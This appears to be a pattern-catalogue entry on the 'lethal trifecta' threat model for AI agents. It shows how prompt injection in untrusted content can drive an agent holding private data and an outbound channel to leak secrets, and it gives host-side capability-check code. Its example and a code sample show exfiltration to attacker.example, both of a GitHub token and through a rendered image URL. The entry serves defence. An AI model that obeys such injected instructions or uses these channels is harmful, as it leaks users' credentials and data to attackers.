VIII · Safety & Control · Emerging

Lethal Trifecta Threat Model

also known as Willison Trifecta, Three-Capabilities Exfiltration Risk

Block prompt-injection-driven exfiltration by ensuring no single agent execution path holds all three of: access to private data, exposure to untrusted content, and an outbound communication channel.

Context

A team builds a tool-using agent that combines three capabilities in the same execution: it reads data the operator wants to keep private (tokens, customer records, internal files), it ingests content from sources the operator does not control (emails, fetched web pages, third-party API responses, Model Context Protocol (MCP) servers from unknown providers), and it can call tools that transmit information outside the trust boundary (public HTTP requests, image-URL renders, link previews, chat webhooks, even error reports). This combination is extremely common: it describes email assistants, browsing agents, coding agents with MCP servers, and any large language model that can both query internal systems and reach the public internet.

Problem

An attacker only has to plant one well-crafted prompt-injection payload in any piece of untrusted content the agent will read. Once that payload reaches a model that also has access to private data and an outbound channel, the injection can instruct the model to fetch the private data and send it out. The model has no reliable way to refuse, because to the model, instructions embedded in data are indistinguishable from instructions in the system prompt. Filtering the untrusted content is unreliable, and so is prompting the model to ignore embedded instructions. The outbound channels are also easy to overlook: image URLs, link previews, error reports, and ordinary tool calls all serve as exfiltration paths.

Forces

  • Each of the three capabilities is individually useful, and many real agents need all three.
  • Prompt-injection content is indistinguishable from legitimate content to the model.
  • Outbound channels are easy to overlook — image URLs, link previews, error reports, and tool calls can all serve as exfiltration paths.
  • Removing capabilities reduces agent utility; the operator must consciously trade utility for safety.
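
To make the "easy to overlook" point concrete, here is a minimal sketch of how a rendered image URL acts as an outbound channel. The regular expression, the function name `outbound_urls`, and the sample output string are illustrative assumptions, not part of the pattern; the sketch only covers Markdown-style links and images.

```python
import re
from urllib.parse import parse_qs, urlparse

# Matches Markdown links and images: [text](url) and ![alt](url).
# Illustrative only; real output may carry URLs in many other forms.
MD_URL = re.compile(r"!?\[[^\]]*\]\((https?://[^\s)]+)\)")


def outbound_urls(model_output: str) -> list:
    """Return every URL a Markdown renderer might fetch or preview."""
    return MD_URL.findall(model_output)


# Hypothetical model output after a successful injection: the "status badge"
# smuggles data out in the query string as soon as the image is rendered.
sample = "Build passed. ![status](https://attacker.example/pixel.png?d=SECRET)"

for url in outbound_urls(sample):
    parts = urlparse(url)
    print(parts.hostname, parse_qs(parts.query))
```

No explicit "send" tool is involved here: rendering the output is itself the transmission, which is why image renders and link previews need an outbound tag of their own.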

Example

A coding agent runs with the user's private GitHub token (private data), browses a third-party documentation site for setup instructions (untrusted content), and can post to a chat webhook for status updates (outbound channel). A prompt-injection payload hidden in a third-party docs page tells the model to fetch the GitHub token and POST it to attacker.example via the chat webhook. The trifecta is complete; the attack succeeds. Removing any one leg — running browsing in a tokenless subagent, disabling the chat webhook for the browsing leg, or stripping outbound DNS — would have blocked it.
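
The example can be modelled as a small capability check. This is a sketch under assumptions: the tool names (`github_api_with_token`, `browse_docs`, `chat_webhook`) and the `Cap` enum are hypothetical labels for the three legs, not names from any real framework.

```python
from enum import Enum


class Cap(Enum):
    PRIVATE_DATA = "private-data read"
    UNTRUSTED_CONTENT = "untrusted-content ingest"
    OUTBOUND = "outbound communication"


TRIFECTA = frozenset(Cap)

# Hypothetical tool names standing in for the three legs of the example.
TOOL_CAPS = {
    "github_api_with_token": {Cap.PRIVATE_DATA},
    "browse_docs": {Cap.UNTRUSTED_CONTENT},
    "chat_webhook": {Cap.OUTBOUND},
}


def capabilities(tools):
    """Union of the capability tags of every tool reachable in one run."""
    caps = set()
    for name in tools:
        caps |= TOOL_CAPS[name]
    return caps


def completes_trifecta(tools):
    """True when a single run can reach all three capabilities."""
    return capabilities(tools) >= TRIFECTA


original_run = ["github_api_with_token", "browse_docs", "chat_webhook"]
tokenless_browsing_subagent = ["browse_docs", "chat_webhook"]
browsing_without_webhook = ["github_api_with_token", "browse_docs"]

print(completes_trifecta(original_run))                 # True
print(completes_trifecta(tokenless_browsing_subagent))  # False
print(completes_trifecta(browsing_without_webhook))     # False
```

Each mitigation in the example corresponds to dropping one entry from the run's tool list, so the check fails for the original run and passes for either reduced one.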

Solution

Therefore:

Treat the three capabilities — **private-data read**, **untrusted-content ingest**, and **outbound communication** — as a tagged capability set on every tool and data source. For each agent execution path, enforce at orchestration time that at least one of the three is missing. Concrete moves: split the agent into two runs (one that reads private data, one that reads untrusted content), strip outbound network for the run that touches both, or sanitise untrusted content into typed fields before it reaches private-data context. The check is performed by the host, not by guardrail prompts.
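
One way the host-side check might look is sketched below. It assumes a dynamic interpretation: the host records which capabilities a run has already touched and refuses the tool call that would add the third. `Tool`, `ExecutionPath`, `TrifectaViolation`, and the three sample tools are hypothetical names introduced for illustration.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, FrozenSet, Set


class Cap(Enum):
    PRIVATE_DATA = "private-data read"
    UNTRUSTED_CONTENT = "untrusted-content ingest"
    OUTBOUND = "outbound communication"


TRIFECTA = frozenset(Cap)


class TrifectaViolation(Exception):
    """Raised by the host when a call would complete the trifecta."""


@dataclass(frozen=True)
class Tool:
    name: str
    caps: FrozenSet[Cap]
    run: Callable[[str], str]


@dataclass
class ExecutionPath:
    """Host-side record of the capabilities one agent run has touched."""
    seen: Set[Cap] = field(default_factory=set)

    def call(self, tool: Tool, arg: str) -> str:
        would_hold = self.seen | tool.caps
        if would_hold >= TRIFECTA:
            # Enforced in host code; the model is never asked to decide.
            raise TrifectaViolation(
                f"refusing {tool.name}: path would hold all three capabilities"
            )
        self.seen = would_hold
        return tool.run(arg)


# Stub tools; real ones would read secrets, fetch pages, and send messages.
read_secrets = Tool("read_secrets", frozenset({Cap.PRIVATE_DATA}), lambda _: "s3cr3t")
fetch_page = Tool("fetch_page", frozenset({Cap.UNTRUSTED_CONTENT}), lambda url: "<html>")
post_webhook = Tool("post_webhook", frozenset({Cap.OUTBOUND}), lambda msg: "sent")

path = ExecutionPath()
path.call(read_secrets, "")
path.call(fetch_page, "https://docs.example/setup")
try:
    path.call(post_webhook, "status: done")
except TrifectaViolation as err:
    print(err)  # prints the refusal message
```

A static variant would instead reject the run's tool list before it starts. The dynamic form shown here lets a run keep any two capabilities and blocks only the call that would add the third.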

What this pattern forbids. An execution path may not simultaneously read private data, ingest untrusted content, and reach an outbound channel; tools missing capability tags must be treated as carrying all three.
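
The fail-closed rule for untagged tools can be sketched as follows. The convention that `None` means "no tags declared" while an empty set means "explicitly none of the three" is an assumption made for this illustration, as are the function names and tool names.

```python
from enum import Enum
from typing import Dict, FrozenSet, Iterable, Optional


class Cap(Enum):
    PRIVATE_DATA = "private-data read"
    UNTRUSTED_CONTENT = "untrusted-content ingest"
    OUTBOUND = "outbound communication"


ALL_THREE = frozenset(Cap)


def effective_caps(declared: Optional[Iterable[Cap]]) -> FrozenSet[Cap]:
    """Untagged (None) is treated as carrying all three capabilities."""
    if declared is None:
        return ALL_THREE
    return frozenset(declared)


def path_is_allowed(tools: Dict[str, Optional[Iterable[Cap]]]) -> bool:
    """A path is allowed only if at least one capability is missing."""
    held = set()
    for tags in tools.values():
        held |= effective_caps(tags)
    return not (held >= ALL_THREE)


# A pure calculator declares an explicit empty set and is harmless.
print(path_is_allowed({"calculator": set(), "fetch_page": {Cap.UNTRUSTED_CONTENT}}))  # True
# A newly added, untagged MCP tool makes the whole path forbidden.
print(path_is_allowed({"calculator": set(), "new_mcp_tool": None}))  # False
```

Under this default, forgetting to tag a tool makes the host more restrictive rather than less, so an incomplete inventory cannot silently open an exfiltration path.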

And the patterns that stand alongside it, or against it —

  • complements Dual LLM Pattern: Split agent work between a privileged model that holds tool access and a quarantined model that reads untrusted content, exchanging only opaque references between them.
  • complements Prompt Injection Defense: Tag user-supplied or tool-supplied content as untrusted and refuse to follow instructions found inside it.
  • complements Input/Output Guardrails ★★: Validate inputs before they reach the model and outputs before they reach the user.
  • complements Sandbox Isolation ★★: Run agent-emitted code or actions in a contained environment with restricted filesystem, network, and process privileges.
  • complements Tool Output Poisoning Defense: Treat tool output as untrusted content and apply instruction-stripping plus per-tool trust labels.
  • complements Control-Flow Integrity: Treat the agent's planned step sequence as a trusted control-flow graph that tool outputs, retrieved content, and user-supplied data cannot redirect at runtime.
  • complements Action Selector Pattern: Eliminate the feedback channel from tool outputs back into the agent's reasoning step by having the agent select actions from a fixed catalog rather than free-form generation over tool output.
